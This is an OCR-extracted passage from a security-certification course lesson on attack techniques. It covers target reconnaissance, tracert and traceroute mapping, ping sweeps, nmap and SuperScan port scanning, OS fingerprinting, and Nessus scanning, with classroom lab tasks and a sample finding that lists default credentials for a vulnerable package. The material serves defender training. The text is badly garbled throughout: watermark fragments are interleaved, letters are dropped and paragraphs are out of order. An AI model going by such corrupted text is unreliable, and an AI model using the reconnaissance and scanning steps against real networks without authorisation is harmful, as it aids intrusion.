What versions of BIND were susceptible to the Lion worm?
Ed
iti
on
There are 13 Root DNS servers distributed across four countries.
You have congured your browser to not accept cookies by default. However, there are certain sites you want to go to that require you to have cookies enabled. Describe how you would congure your browser to allow cookies from such a site. On the Privacy tab, click the Advanced button. Override the default behavior by specifying Web sites that you want to explicitly accept cookies from. As an administrator, you need to secure your users email client software. What is one of the rst and easiest settings to take care of? Disabling the Preview pane.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Attack Techniques
Overview
In this lesson, you will be introduced to the common techniques used to attack networks and various operating systems. You will follow examples on how to map networks, identify the types of operating systems on the network, and scan for potential holes in those operating systems. You will be introduced to the concepts behind viruses, Trojan Horses, and worms. You will identify the techniques used in password cracking, and you will explore and discuss basic scripting techniques.
LESSON
Objectives
To become familiar with attacking techniques, you will: 8A Dene the process of network reconnaissance.
Ed
NO T DU PL IC
8B
Map a network with provided tools.
Given a simple network scenario, you will use tracing tools to map the physical layout of a network. 8C Sweep a network with the provided tools.
Given a simple network scenario, you will use network sweeping tools to identify active hosts in a target network. 8D Scan a network with provided tools.
Given a simple network scenario, you will use network scanning tools to determine which ports are open on target computers. 8E Differentiate between a virus, a worm, and a Trojan Horse.
st
Given a network scenario, you will dene how a virus, worm, or Trojan Horse represents a threat and how they are differentiated from one another.
8G
In
8F
Implement a malicious Web site. In this topic, you will see how ordinary users can be tricked into downloading or running programs on their computers via the Web. Gain control over a network system. Given a simple network scenario, you will gain control over a system by using Netcat.
Lesson 8: Attack Techniques 481
DO
ru ct
or
AT
Given a network scenario, you will describe how to use network reconnaissance to gather information about a target.
iti
on
Data Files Malweb folder and contents Lesson Time 6 hours
8H
Record keystrokes with software and hardware. Given a simple network scenario, you will use software and hardware recording tools to log the keystrokes entered on a keyboard.
8I
Crack encrypted passwords on Linux and Microsoft machines.
8J
Reveal passwords hidden by asterisks.
Given a simple network scenario, you will use password-revealing tools to identify hidden passwords. 8K Explore and discuss social engineering techniques.
Given a simple network scenario, you will explore and discuss social engineering techniques used to gather information about and access to a target network. 8L Analyze an example of social engineering. Given a scenario of social engineering, you will identify the methods used and information gained by an attacker. 8M Investigate potential ways that unauthorized administrator access can be achieved.
Ed
T DU
or
DO NO
482
In
st
ru ct
8O
8N
Hide the evidence from an attack.
Given a simple network scenario, you will determine ways to hide the evidence of an attack, such as by clearing log les in both Windows and Linux operating systems. Perform a Denial of Service on a target host. Given a simple network scenario, you will use Denial of Service tools to take a target computer offline.
PL
IC
You will see how basic programming skills can be used to give a user account administrative privileges on a Windows 2000 network; how physical access to the server, along with another OS and a little advanced knowledge of how Windows works, can be used to compromise an unpatched Windows NT Server; and how a Linux machine can be compromised by booting to single-user mode.
AT
iti
on
Given a simple network scenario, you will use tools to crack encrypted passwords on Linux and Windows computers.
Topic 8A
Network Reconnaissance
Finding a Target
Ed
T DU PL IC
Finding the target network is a process that requires extremes, such as from having a very clever and creative mind to simply driving down the street. If the hacker is simply hacking for fun, any business that looks interesting is a good target. If the hacker is trying to challenge himself, then a bit more work is required than a simple drive-by, looking for the neatest looking building.
These are some of the questions hackers must answer before they go to work: Who/What am I going to hack? Why am I going to hack?
Without knowing the answers to these questions ahead of time, the hacker is doomed to failure.
st
In
If there is no useful data in the newsgroups on a given day, another valuable resource for the hacker is to search the SEC (Securities and Exchange Commission). The SEC has records on all recent business mergers and acquisitions. Searching through the press releases of various business mergers and modications may be all that a hacker needs to identify a potential target.
DO
For many hackers, newsgroup browsing is like shing. Perhaps you need to wade through hundreds of messages, but if you wait long enough, you will get a bite. Be wary of posting too much information or real IP addresses in a newsgroup, even if it is a strongly moderated group.
NO
Assuming that the basic questions are answered, the hacker begins the reconnaissance. One of the primary areas to go for potential targets is to a newsgroup. New network administrators will practically give away their network contents in a newsgroup to someone who seems helpful.
ru ct
What am I looking for if access is gained?
or
AT
Common newsgroups that hackers may browse are any groups related to administration, security, and protocols.
There are tools available to the potential hacker, although the best tool is the brain. Being able to read the newspapers, hardcopy or online, is how many hackers nd their targets. But what are they looking for, or what are they trying to nd?
Lesson 8: Attack Techniques
E
483
iti
For example, what network is the hacker even trying to get into? How did they choose this network? This is where the work can come in. For many hackers, the actual act of network penetration is not the difficult task. It is the task of nding a network to target in the rst place.
on
One of the rst things to realize is that hacking (cracking, phreaking, and so forth, will all be referred to as hacking in this lesson) is generally a tedious process. It is, in reality, quite unlike the movie visualizations of hacking. It isnt simply typing in a string of a few numbers and magically gaining access to a network.
phreaking: The art and science of cracking the phone network.
penetration: The successful unauthorized access to an automated system.
Network Reconnaissance
or
DO NO
back door: A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.
ru ct

If a potential company has been found via an SEC search or by other means, the next step is to nd out more information about the company. The SEC ling is usually quite comprehensive as far as the amount of data it reveals; however, there are other places to go to gain further knowledge.
In
484
st
Who is the Target?
The next place to go to learn about a company is their Web site registration information. This information is easily available, and in some instances contains incredible amounts of data about the company. Common registration searches are located at the following Web sites: General searches: www.internic.com/alpha.html. The U.S. military directories: http://whois.nic.mil. The U.S. government directories:http://whois.nic.gov.
DU
It is during this loose period that the hacker may sneak in an open hole in the network. The hacker will attack the smaller company in hopes that the security is lowered, which it usually is, compared to the bigger company. By nding a weak point in the smaller company and exploiting it before the merger is complete, the hacker can gain a back door entry into the larger company.
PL
IC
The usefulness of this information is varied. But in many situations, when a large company takes over or buys out a smaller company, one of the rst issues is connectivity between companies. Much of the time, security is loosened a bit to ensure that all employees in every location can communicate.
AT
Figure 8-1: The SEC Web site.
Ed
iti
on
ru ct
st
In
DO
NO
T
DU
PL
A search through one of these directories can reveal information such as the physical address of the company, the name of the person who owns the DNS domain name, the name of the network administrator, the company phone number, the company fax number, the email addresses of administrators, the DNS servers that the company (or at least the Web site) uses, the ISP that the company uses, other domain names the company owns, the IP address range assigned to the target company, and more. See Figure 8-3 for an example of a Whois output.
or
IC
AT
E
485
Figure 8-2: An example of a search lookup tool.
Ed
iti
on
or
DO NO
ru ct

Record Updates: This denes the last time the record was updated, and when it expires. Network Addresses: This denes the IP addresses associated with the domain name. DNS Server Addresses: This denes the DNS servers responsible for the domain name.
In
st
Studying the Message Source

A follow up would be to send an email to a made-up address, something that will be returned as an unknown recipient. Then, the message source can be studied, to learn the details about the email servers used in the target network. See Figure 8-4 for an example of reading the message source of an email message.
DU
Contact Names: This denes the person(s) responsible for billing and/or administrative functions of the domain name. At times, this will also list the actual email addresses and phone numbers of the contact names.
PL
Mailing Addresses: This denes the mailing and/or the physical address of the business or person who owns the name.
IC
Information learned from the Whois lookup includes: Registrar: This denes whom the actual person or company is that owns the domain name.
AT
Figure 8-3: The output results from running a Whois lookup on the Web site NetworkSolutions.com, one of the most popular registration sites on the Internet.
Ed
iti
on
Figure 8-4: An example of the message source of an email message.
or
DO NO
ru ct
One of the above items that needs to be addressed is the other domain names a company might own. Often, the smaller satellite sites have looser security implementations, and may be the starting point for an attack. If the company owns many sites and they are all active, they all need to be secured, not just the primary one.
In
st
After this initial network reconnaissance has been completed and a potential target network has been identied, the hacker must next learn all of the details possible about this target network.
DU
So, in a matter of minutes, a hacker using registration searches and a bogus email can learn quite a bit of information about the potential target. Try this for your own company this coming weekend, and see what you can learn. You may be able to learn details you did not know, even though you work there!
PL
IC
In Figure 8-4, you can see that a hacker can learn the names of the email servers inside the potential target networkin this case: mailserver.securitycertied.net. The hacker learns that the private IP address being used is 192.168.23.45. This may indicate the address range used inside the company. Other message sources can reveal public IP addresses, as well as the names (and even the naming schemes) of the companys routers. All of this information can be learned via a simple returned email message.
Ed
AT
E
487
iti
on
Topic 8B
Mapping the Network
Mapping the Network
Mapping Tools
ru ct
st
C:>tracert 10.0.10.100 Tracing route to 10.0.10.100 over a maximum of 30 hops: 1 <10ms <10ms <10ms 192.168.15.1 2 70ms 81ms 71ms isp1.net [172.16.31.1] 3 54ms 37ms 48ms isp2.net [169.254.48.100] 4 61ms 73ms 65ms isp3.net [10.0.10.57] 5 27ms 29ms 25ms 10.0.10.100
488
In
DO
NO
The traceroute program is spelled tracert in Windows operating systems to follow the 8.3 naming convention.
The following is an example of a trace completed on a Windows 2000 computer:
Using tracert on Windows
DU
The UNIX (and Linux) implementations of traceroute use UDP (User Datagram Packets) packets as the default, but they do have the option to use ICMP (Internet Control Messaging Protocol) packets via the -I switch. Windows NT (and 2000) use ICMP echo request packets by default.
PL
Using Traceroute allows for identication of the routers on a given network and provides information as to their ltering properties. It is not uncommon for rewalls to block traceroute from passing through. Knowing this information, a hacker is able to make an educated guess as to which IP addresses are rewalls and which are routers.
or
IC
AT
The standard free tool that most hackers have to use for network mapping is the traceroute utility. Traceroute is included in most versions of UNIX, Linux, Windows NT, and Windows 2000. Traceroute is a simple and highly effective tool for dening the path that packets are taking across the network from node to node. Written to use the Time To Live eld (TTL) of an IP packet, traceroute creates ICMP TIME-EXCEEDED messages from each node. For each router (or node) the packet passes through, the TTL is lowered by one. This has the net effect of allowing the TTL eld in the packet to become the hop count.
Ed
network security: Protection of networks and their services from unauthorized modication, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.
Using Traceroute
iti
There are many tools available to the network security professional to manage their networks. Some of these tools are free, while others have costs associated with them. The very same tools that are used by the administrators and security professionals are used by hackers in trying to map out potential target networks.
on
With the potential target network identied, the next phase a hacker needs to complete is to map the network. What this means is to identify the topology of the network and to identify as many of the nodes possible by their IP addresses and their position in the network.
TASK 8B-1
Using Windows Tracing Tools
1. 2.
Open a command prompt, and enter tracert 172.17.10.1 to trace the route to the specied IP address. View the results, paying particular attention to: Time between hops Addresses resolved Overall number of hops
3.
Close the Command Prompt.
Using traceroute on Linux
Linux also has tracing tools included. The executable is named traceroute on Linux operating systems. The following is an example of Linux tracing:
[lnx1]$ traceroute 10.0.10.100 traceroute (10.0.10.100), 30 hops max, 40 byte packets 1 dg1 (192.168.15.1) 7.933ms 8.719ms 8.211ms 2 isp1 (172.16.31.1) 68.762ms 79.204ms 72.659ms 3 isp2 (169.254.48.100) 56.843ms 37.026ms 47.242ms 4 isp3 (10.0.10.57) 61.845ms 73.407ms 64.921ms 5 10.0.10.100 (10.0.10.100) 27.721ms 29.285ms 26.387ms
Ed
T DU PL IC
Using Graphical Tracing Tools
NeoTrace, found at www.neotrace.com.
st
In
DO
Each of these tools provides for graphical mapping of the data path and much more. In addition to providing an actual image of the route, these tools can perform functions such as Whois lookups, the physical location of each hop, time between hops, and more.
NO
In addition to the tools that ship with both Windows and Linux operating systems, there are many commercially available tools for tracing. Two of these tools can be tried as downloadable evaluation copies and purchased later if desired: VisualRoute, found at www.visualroute.com.
ru ct
or
AT
E
489
iti
on
or
DO NO
ru ct
In
st
DU
PL
A useful, or at least interesting, option available when you are using NeoTrace, if you have an Internet connection, is to show either a map or a satellite image of the location you are tracing to (or any of the nodes in between).
IC
AT
Another tool, in the same category as VisualRoute, is NeoTrace. In a slightly different visual format, these two tools are designed to show the network on-screen during the trace.
Figure 8-5: An example of using Visual Route.
Ed
iti
on
Ed or
T DO NO DU PL IC
Figure 8-6: An example of using NeoTrace.
TASK 8B-2
Using VisualRoute
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. Copy the VisualRoute installation program from the location provided by your instructor to your desktop. Double-click the installation program, and follow the prompts to install VisualRoute in the default location. Start the VisualRoute program. It should be found in the Start menu, under Programs. Select English as the language, if necessary.
ru ct
AT
Provide students with the location of the VisualRoute installation les.
2. 3. 4.
In the Enter Host/URL text box, enter the IP address of another computer in your class, such as 172.17.10.1. Select the link and view the results, paying particular attention to the following: Time between hops Addresses resolved Overall number of hops
5.
In
Close VisualRoute and any other open windows.
st
E
491
iti
on
Topic 8C
Sweeping the Network
Sweeping the Network
The different options for learning about a network include: Network ping sweeps ICMP queries Automated discovery tools Operating system detection
Ping Sweeping
Ping Sweeping
2. 3. 4.
The hosts that respond are determined to be the ones that are active. The hosts that do not respond are assumed not active. By looking at the list of responding hosts, the hacker can determine what the active range of IP address is.
or
DO NO
ru ct In
The default operation of ping is to issue an ICMP ECHO packet request to the remote host. The remote host would then return an ICMP ECHO_REPLY packet, which indicates nothing more than the remote node is on and responding. There are ping sweep utilities made, so the hacker does not have to enter each possible address manually. Take care when dening the IP addresses for a ping sweep. If the broadcast address for a segment is included in the sweep, a denial of service may result. Also, try not to perform such scanning while on the Internet; someone may complain, and your ISP may cut you off.
st
Linux Ping Sweeping with the fping/gping Tool

The common ping sweep for UNIX/Linux is called fping/gping. Gping generates the list of potential addresses and submits that information to fping. Fping then performs the ping function and sends the output to a text-readable le that identies active hosts.
DU
The ping sweep method is effective, but it is worth noting that an administrator can have hosts congured to not respond to different types of ping, as you will see later. If the ping sweep is not producing the results the hacker is looking for, he or she will simply modify the properties of the sweep to try different attempts.
PL
IC
AT
Network ping sweeps are used to determine which of the remote hosts on a given segment are active. The concept is somewhat simple, yet effective: 1. Ping a given range of hosts.
Ed
iti
on
Once the basic mapping of the target network has been completed with the given tools such as NeoTrace Pro, Visual Route, and traceroute, the hacker will need to get more details about the target nodes that are in the network. This is where network scanning comes into play. By using a network scanner of a given type, the hacker can start to identify the potential target machines inside the network. The potential target has been identied, now it is time to start to look for a potential entry point.
[Server] $ gping 192 168 1 1 254 | fping -a 192.168.1.207 is alive 192.168.1.7 is alive 192.168.1.48 is alive 192.168.4.52 is alive ...
Linux Ping Sweeping with the nmap Tool
or
DO NO T
Windows users are not left behind when it comes to ping sweep utilities. These function via a command prompt or a GUI and present the results in the responding window. They work on the same premise, by lling a starting and ending address, then telling the program to sweep. Examples of common Windows ping sweepers are Pinger, SuperScan, and Ping Sweep. (Ping Sweep is part of a professional set of networking tools from SolarWinds Solarwinds.net.)
ru ct
Pinger
In
st
Pinger is a fast, efficient, and lightweight Windows tool for network ping sweeps. After you dene the starting and ending IP addresses, followed by options such as number of passes and name resolution, Pinger is able to complete its task quickly.
DU
PL
Windows Ping Sweepers
IC
AT
[Server] $ nmap -sP 192.168.1.0/254 Starting nmap V . 2.53 by foyodor@insecure.org (www.insecure.org/nmap/) Host (192.168.1.1) appears to be up. Host (192.168.1.7) appears to be up. Host (192.168.1.48) appears to be up. Host (192.168.4.52) appears to be up. ...
Ed
One of the most used and most respected network tools is nmap. Written by an individual named Fyodor, this is one tool that all security professionals are comfortable with. In this section, we will investigate only one area of nmap, but this is one tool you will see several times. The following example of nmap is being used to locate active hosts:
E
493
iti
on
A major benet in the operation of fping/gping is the speed at which the commands complete. In a traditional sense, using ping means send one packet to the remote host, wait for the response, and then proceed to the next host. As you can see, following this method will take quite some time if there are hundreds or thousands of nodes to ping. Fping/gping is able to speed up this process by submitting a mass request out to the network in parallel. This rather simple approach is quite effective, as shown here:
ru ct st
In
DO
NO
DU
PL
IC
SuperScan is another tool like nmap that has many more functions than simply identifying active hosts. We will return to SuperScan later in the course, but for now will focus on the active host identication option. See Figure 8-8 for the SuperScan default window.
or
AT
SuperScan
Figure 8-7: An example of Pinger before IP addresses are dened.
Ed
iti
on
ru ct
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. Copy the SuperScan installation program from the location provided by your instructor to the desktop. Then double-click it and follow the prompts to install SuperScan in the default location. The program automatically starts when the installation is complete.
DU
PL
Provide students with the location of the SuperScan installation le.
Using SuperScan
2.
st
3. 4. 5. 6. 7.
Under Scan Type, select Ping Only.
Verify that Resolve Hostnames is checked.
In
Verify that Show Host Responses is checked, even though it is grayed out. Click Start to begin the scan. Because SuperScan pings every possible address, the scan takes a while to complete. Observe the responses from the other hosts in the room as they are displayed in the GUI.
DO
In the IP Start and Stop text boxes at the left of the screen, enter the starting IP address of your portion of the class network and the ending IP address of the network. For instance, if you are on the LEFT side of the room, you might enter 172.16.0.1 through 172.16.10.6
NO
IC
TASK 8C-1
or
AT
Figure 8-8: SuperScan in default mode, before a scan begins.
Ed
iti
on
8. 9.
If possible, try to observe the activity on the hubs or switches in the class during this activity. Close SuperScan.
Scanning the Network
Scanning the Network
Port Scanning
ru ct
st
TCP Null scan. The TCP Null scan sets all ags to off, and the remote node responds with a RST message for all closed ports. TCP Xmas Tree scan. The TCP Xmas Tree scan sends a PUSH, FIN, and URG packet to the target port, which the remote node will respond with a RST for all closed ports.
496
In
DO
Three other scan types are based on the principles of RFC 793, which states how the target system should respond with RST messages: TCP FIN scan. The TCP FIN scan sends a FIN packet to the given port, and the remote node will respond with a RST for closed ports. This scan works best on UNIX TCP/IP stack implementations.
NO
TCP ACK scan. The TCP ACK scan works on a similar premise as the SYN scan in that it does not establish a full connection with the target host. The ACK scan can tell the hacker if the rewall is only accepting full connections, or if it is performing more detailed controlled ltering.
DU
PL
Most Intrusion Detection Systems will detect port scans while they are scanning.
or
TCP SYN scan. The TCP SYN scan makes only a half-open connection. This scan steps part of the way through the three-way handshake, only long enough to receive the request to SYN. Once the request is made, the scanner can assume this port is open and not respond with the full connection. The TCP SYN scan is harder to detect than the full connect scan.
IC
AT
Port scanning an entire network segment can consume high amounts of bandwidth and can be very time consuming.
Port scanning is also the primary method used to identify potential targets in the event that an administrator has disabled ICMP at the rewall. Even if a host does not respond to a ping request, that node may be active, and the port scan can identify this host in hiding. Port scanners have several different methods of operation. Based on the input type, the scanners may use these different methods to avoid detection. A few of the options they can run as are: TCP connect scan. The TCP connect scan makes a full three-way-handshake level connection to the remote host. Since a full connection is created, this type of scan is easy to detect.
Ed
iti
Now that youve identied potential target hosts to hack, you need to nd out how to get into these targets. One way to do this is to identify open ports on the target hosts.
on
Topic 8D
The netstat Tool

Although there are many tools for scanning, it is important to not forget the built-in utilities offered in operating systems. One example is netstat in Windows. Figure 8-9 shows the possible switches that can be used with netstat. Netstat is a powerful tool, but has a limitation in that it does not identify the open program or service that is listening on a port, only that the port is open.
Scanning Tools
Ed ru ct
-s, which denes statistics on a per-protocol basis.
Service Identification
st
The tools you used in the previous topics will be used to their next level here. Most of the same tools we have already looked at, such as nmap and SuperScan, can also be used to dene the active ports. Two other well-known port scanners are Strobe and Netcat. Strobe is an efficient port scanner that is limited to scanning TCP ports, so if UDP ports are the target, a different tool must be selected. Additionally, Strobe uses the TCP full connect method, meaning that Intrusion Detection Systems will pick it up quickly. See Figure 8-10 for an example of Strobe in operation.
In
DO
The hacker wants to know what services are running on the potential targets. Knowing the number of services that are active, and what they are designed to do, will make the hackers entry attempts much more likely to succeed.
NO
Although learning which nodes on the target network are active is important, and using network scanning and sweeping will divulge this information, the hacker is concerned with learning even ner levels of detail.
DU
PL
-e, which displays statistics such as Unicast packets sent and received.
IC
Pay close attention to a few of the more often used switches, such as: -a, which shows all connections and listening ports.
or
Figure 8-9: Netstat switch options.
AT
E
497
iti
on
Figure 8-10: Strobes available options.
-sS: TCP SYN stealth port scan (best all-around TCP scan) -sU: UDP port scan -sP: ping scan (nd any reachable machine)
or
DO NO
ru ct In
-sF, -sX, -SN Stealth Fin, Xmas, or Null scan (experts only)
st
Figure 8-11: Using nmap to port-scan a network host.
DU
PL
IC
AT
A utility we have seen beforenmapalso has great port-scanning and servicedenition options. It has the built-in ability to scan both TCP and UDP ports, as seen in Figure 8-11. There are too many nmap switches to list here, so once it is running, you will want to be sure and check the associated help le. A few of the signicant switches are: -sT: TCP connect () port scan (default)
Ed
iti
on
TASK 8D-1
Using nmap
1. 2. 3. 4. 5.
Log in to Linux as root. Open a Terminal Window. Enter nmap -sS x.x.x.x, where x.x.x.x is any IP address in the classroom network. View the results, noting the open ports and their associated services. Close all open windows.
Windows Port Scanners
or
DO NO
ru ct
Figure 8-12: The options available in NetScan Tools Pro 2001.
In
st
T
DU
PL
IC
NetScan Tools Pro 2001 is one of the most comprehensive administrative tools for understanding a network. Available options include ping sweeps, port scanning, traceroute, whois lookups, and more. See Figure 8-12 for an example of the options in NetScan Tools Pro.
AT
E
499
Although we have just used Linux tools for the last exercise, Windows users are not without port scanning tools. From professional tools such as NetScan Tools Pro 2001, to free programs like the SuperScan and WinScan, as well as Nmapnt (a version of nmap for NT), the whole spectrum of network scanning is covered.
Ed
iti
on
SuperScan, which was used in earlier exercises, also has more options than simple ping sweeping. With SuperScan, the options are presented to port-scan by a given range of numbers, all port numbers, or specic lists. It is the specic-list feature that comes in handy. There are predesigned port lists for scanning, and lists can be customized. Figure 8-13 and Figure 8-14 show SuperScan in use.
Ed or
DO NO
ru ct
Figure 8-13: An example of SuperScan during a scan. Nodes with plus signs next to their IP addresses have open ports. Figure 8-14 shows SuperScan after the scan is complete.
In
st
DU
PL
IC
AT
iti
on
Ed ru ct
TASK 8D-2
1. 2. 3. 4. 5. 6. 7. 8.
Using SuperScan
Log on to Windows 2000 as the renamed Administrator account. Start the Super Scan program.
st
Under Scan Type, select All Ports From.
In
Set Port Values from 1 to 1024. Leave Show Host Responses checked. Start the scan.
Observe the responses from the other hosts in the room as they are displayed in the GUI. If possible, try also to observe the activity on the hubs or switches in the class during this activity.
DO
In the IP Start and Stop text boxes, enter the starting and ending IP addresses of your portion of the classroom network.
NO
DU
PL
IC
Figure 8-14: An example of SuperScan after a scan has been completed. Notice the node that has been expanded to reveal the open ports.
or
AT
iti
on
9.
When the scan is complete, click the Expand All button in the lower-right area of the screen, to see what ports are open on the other computers in the classroom.
10. Compare these results with the ones you saw from using nmap. If you need a reminder for the nmap results, see Figure 8-11. 11. Close SuperScan.
Identifying the Operating System and OS Version
or ru ct st
Figure 8-15: An example of a banner posted as a warning on a router.
In
A warning message is needed, and required by most security policies; however, giving out too much information is not needed or desirable. There is no need to make a hackers job easier. Banner grabbing is one of the simplest methods of learning information.
DO
NO
DU
PL
IC
AT
Banner grabbing is the oldest and most simple technique for identifying the operating system. A potential hacker tries to telnet to a given target host. That target may prompt for a user name and password. Many times, in the banner message for the telnet session, the system administrator has left clues to, or even has labeled, the identity of the device the hacker is connecting to. For example, Figure 8-15 shows the banner screen for a telnet session.
Ed
Once the hacker has an idea of the available targets, he or she next needs to try to identify what operating system is running and, if possible, the version of the operating system. By learning all of the possible details of a potential target, the hacker knows his or her chances of a successful connection increase drastically. There are several ways a hacker can try to identify the operating systems running on a network. He or she can try banner grabbing, active stack ngerprinting, and passive stack ngerprinting.
iti
on
Ed or ru ct
Figure 8-16: Viewing the source code of a Web site.
st
The specic details of what the hacker will look for vary from person to person, although there are some very common points that most hackers use. The hacker picks these small variations of TCP/IP by either performing passive or active ngerprinting.
In
Although TCP/IP is an industry standard, most vendors have slightly different implementations of TCP running on their systems. By being aware of this, a hacker can look at the way TCP/IP operates on a potential target, and by analyzing this data, make an educated guess at what the OS is.
DO
Once the hacker has checked to see if banner grabbing offers any further details, and nds out that there are none, he or she might move to stack identication. Stack identication is the process of examining the TCP/IP protocol stack that is running.
NO
Stack Identification
T
DU
PL
IC
AT
E
503
iti
In addition to banner grabbing from a telnet session, another common technique that hackers can use is to identify the operating system by reading the source code of Web sites. Some Webmasters put relevant information in the comment elds of their Web sites. This information can include what was used to create the Web site, such as Microsoft FrontPage. If FrontPage created the Web site, the hacker can be relatively sure that the site is hosted on a Microsoft box, most likely Windows NT. Figure 8-16 shows an example of a Web source.
on
Banner grabbing, in general, is no longer a method that hackers can rely on with any degree of certainty. Most administrators are aware of banner grabbing and no longer have clues to the OS listed in cleartext that anyone can see. In fact, a clever administrator will put in banners from other OSs just to confuse a would-be banner grabber. These are all supercial issues however, as there are still other instances of too much information easily available, so administrators should double-check their systems.
TCP Initial Window Size: In the TCP/IP lesson, we discussed the concept of windowing. Some operating systems use unique values for the initial window size, and this can be used to help identify the operating system. Dont Fragment Bit: Some TCP/IP stacks are set to dene whether or not the Dont Fragment bit is turned on or off. ICMP Message Quoting: When an error message is quoted by ICMP, some implementations send the IP header with an additional 8 bytes. However, Solaris and Linux will send more. ICMP Message Quoting does not require any listening ports.
Some tools, such as nmap, will try to identify the OS via active stack ngerprinting for the hacker. Figure 8-17 shows an example of nmap active stack ngerprinting.
Ed
T DU
or st
Figure 8-18 shows another example of nmap active stack ngerprinting.
In
DO
ru ct
Figure 8-17: An example of nmap performing active stack OS ngerprinting. Notice the Remote Operating System guess.
NO
PL
IC
AT
iti
on
Active stack ngerprinting is when the hacker has a TCP/IP packet from the potential target and dissects the packet looking for these points. The common ngerprint points that hackers look at are the following: FIN Probe: The FIN probe takes advantage of the way TCP/IP responds to an open port probe. In many implementations, there will be no response from the probed port. One exception to this is the way Windows NT responds. Windows NT responds with a FIN/ACK response.
Figure 8-18: Another example of nmap performing active stack OS ngerprinting. Notice the Remote Operating System guess. If the hacker does not choose to use active stack ngerprinting, or wishes to be stealthier, he or she can also try passive stack ngerprinting. Passive stack ngerprinting uses many of the same checks to determine the type of operating system in use. The process is slightly different in the fact that the hacker is not initiating a connection with the potential target. Since there is no established connection, the chances of detection are much lower. However, passive stack ngerprinting requires access to the medium in order to sniff the packets for identication.
Ed
T DU PL IC
Using nmap to Identify the OS
st
We will now look at another useful feature of nmap, which, incidentally, stands for Network MAPper, and is a favored security tool designed for network exploration or security auditing. It is available at www.insecure.org. It can perform fast scans of entire networks and scans individual hosts just as well. It uses raw IP packets to determine which hosts are active on the target network and what ports they have open and listening. It is also able to try and identify the operating system running by matching TCP/IP signatures. There are both command-line and GUI versions, and a version of nmap for NT is also available from www.eEye.com.
ru ct
The common methods of passive stack ngerprinting include the Window Size and DF (Dont Fragment) bit, as mentioned above. Another common passive stack ngerprinting option is to check the TTL (Time To Live). Some operating systems use a unique value for this setting.
NO
or
DO
AT
security audit: A search through a computer system for security problems and vulnerabilities.
In
E
505
iti
on
TASK 8D-3
Using nmap to Identify an Operating System
1. 2. 3.
Log in to Linux as root.
Open a Terminal Window, and enter nmap -sS x.x.x.x -O, where x.x.x.x is the IP address you want to scan and O is the letter O, not the number zero.
Using the nmap Front End
And as some people dont seem to like using a command line, we will now see that there is a GUI version of nmap called Nmap FE.
Ed
T DU
or st In
Figure 8-19: The graphical version of nmap.
DO
ru ct
NO
PL
IC
AT
iti
View the results, noting the open ports, their associated services, and the OS guess at the bottom of the report.
on
TASK 8D-4
Using nmap Front End
1. 2. 3.
In the Terminal Window, enter nmapfe to run the Nmap Front End. Use the GUI to scan another host in the class, nding open ports and identifying the operating system of the target. Close NmapFE.
Using Nessus to Perform a Scan
In this section, screens of Nessus 1.2.7 are shown, even though it is an older version of the software. Visit www.nessus.org to download the latest stable version.
Ed
T DU PL IC
To understand the security holes that can be exploited on a system, a full security scan should be used. Nessus is a tool that provides this option. It can perform different types of port scans, and it can report on security holes found in the network.
st
In
DO
ru ct
NO
or
AT
iti
As of the time of this writing, version 2.0.3 was the most current stable version of the tool.
on
507
Setup: You are logged on to Linux as root, and a Terminal Window is open.
Ed or
DO NO
Figure 8-20: The available Nmap scan options in Nessus 1.2.7.
ru ct

The security report will list the following items: Security risks by rank (High, Med, Low, and Serious). Most dangerous services found on the network. Services that are most available on the network. Operating systems found on the network. Further details of each host scanned.
In
st
The section with further details on each host is where the vulnerabilities are dened. An example of a detailed report is shown here:
DU
Nessus deals with found exploits a bit differently than other security scanners do. It has the ability to actually try and locate buffer overows or even to crash servers. Once it has located vulnerabilities, a report is generated that shows what was found.
PL
IC
AT
iti
on
Vulnerability found on port www (80/tcp) The piranha package is installed on the remote host. This package, as it is distributed with Linux RedHat 6.2, comes with the login/password combination 'piranha/q' (or piranha/piranha)
Solution: upgrade the packages piranha-gui, piranha, and piranha-docs to version 0.4.13 Risk factor: High CVE: CAN-2000-0248
Ed or ru ct
Figure 8-21: An example report after Nessus 1.2.7 has nished scanning.
st
In
DO
NO
T
DU
PL
IC
AT
E
509
iti
From this report, you are able to identify the vulnerability and proceed to either exploit it (in the case of an attacker) or x it (in the case of the security administrator). Remember, CVE (Common Vulnerabilities and Exposures) identies current threats and gives them a standard name/identier for future use and discussion.
on
An attacker may use it to reconfigure your Linux Virtual Servers (LVS).
TASK 8D-5
Installing Nessus for First-time Use
1. 2.
Provide students with the location of the Nessus installer script le.
In your /root directory, create a directory named nessus.
Copy the Nessus installer script le from the location provided by your instructor to the new /root/nessus directory.
4. 5.
Follow the prompts, and accept the default installation directory of /usr/ local. Ignore any warning messages that are displayed, and wait for the installer script to complete. This will take several minutes, so please be patient. If necessary, press Enter to accept the default le location. Observe the Congratulation message that is displayed when installation is complete. The message lists instructions for several tasks related to setting up Nessus. Lets create a certicate rst. Press Enter. Enter nessus-mkcert and accept the default values for lifetimes. Enter the applicable data for Country, State/Province, and Location.
6. 7.
Ed
T DU
8. 9.
or
DO NO
In
510
st
ru ct
10. For Organization, enter SCNPclass.
11. After the certicates are created, press Enter to return to the command line. Next, well create a user.
12. Enter nessus-adduser and for Login, enter testuser. 13. For Authentication, press Enter to select the default of password. 14. For Password, enter password. 15. For the Rules, you will use an Empty Rule Set. Press Ctrl+D to nish this part of the Nessus setup. 16. Answer Yes when you are prompted.
Scanning for Vulnerabilities with Nessus

We will now see how Nessus is used to scan a target network. You rst need to start the Nessus daemon; then, you can scan hosts and networks for security vulnerabilities.
PL
IC
AT
iti
3.
In the Terminal Window, switch to the /root/nessus directory and enter sh nessus-installer.sh to begin the installation.
on
Setup: You are logged on to Linux as root, and a Terminal Window is open.
TASK 8D-6
Using Nessus for Vulnerability Scanning
1. 2. 3. 4. 5. 6. 7. 8. 9.
If necessary, open a Terminal Window, and enter nessusd -D to start the Nessus daemon. After a short pause, the command line is displayed. Enter nessus to open the Nessus Setup window. On the Nessusd Host tab, log in with the user account testuser and the password password. Click Log In. Click OK to close the SSL Setup window, then click Yes to accept the certicate. Click OK to close the Warning box.
Once you are logged in, on the Target Selection tab, enter a target IP address in the class.
AT IC
12. Close all open windows. You can save the report if you like.
st
In
DO
NO
11. Observe that you can even save the report in several formats on the hard drive for later review.
DU
